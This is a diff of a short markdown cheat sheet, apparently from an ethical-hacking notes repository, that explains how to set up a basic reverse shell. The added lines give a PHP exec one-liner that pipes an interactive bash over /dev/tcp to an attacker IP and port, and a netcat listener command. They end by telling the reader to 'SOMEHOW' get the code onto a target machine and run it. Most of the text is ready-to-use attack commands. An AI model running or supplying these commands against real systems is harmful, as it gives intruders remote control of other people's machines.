DaRainbowWarrior/ETHack-CS/basicauth.md

 ## Reverse shell

 This is the basic reverse shell.
-It's not recommended to use this.
-Go and use the [Chained Reverse shell](crevshell.md)
+It is not really recommended to use this.
+You should use [Chained Reverse shell](crevshell.md) instead.

+### Choose a port
+- Usually 4444 is good and free, but if it isn't, anything free above 1024 will do

+### Make a shell code
+- You'll need to find a specific shell code to your usage.
+Google it (eg. [Something like this for PHP](https://gist.github.com/rshipp/eee36684db07d234c1cc))
+- You'll need to change it so it has your ip and port you want to open baked into it
+    - In this example `exec("/bin/bash -c 'bash -i > /dev/tcp/<attack machine IP adress>/<4444 or port that you prefer> 0>&1'");`

+### Make a listener on the attacking machine
+- Just paste this `nc -lvnp <4444 or port that you prefer>`

+### SOMEHOW get this code onto the target pc and run it
+- Then the target pc should link back to you via Netcat (nc)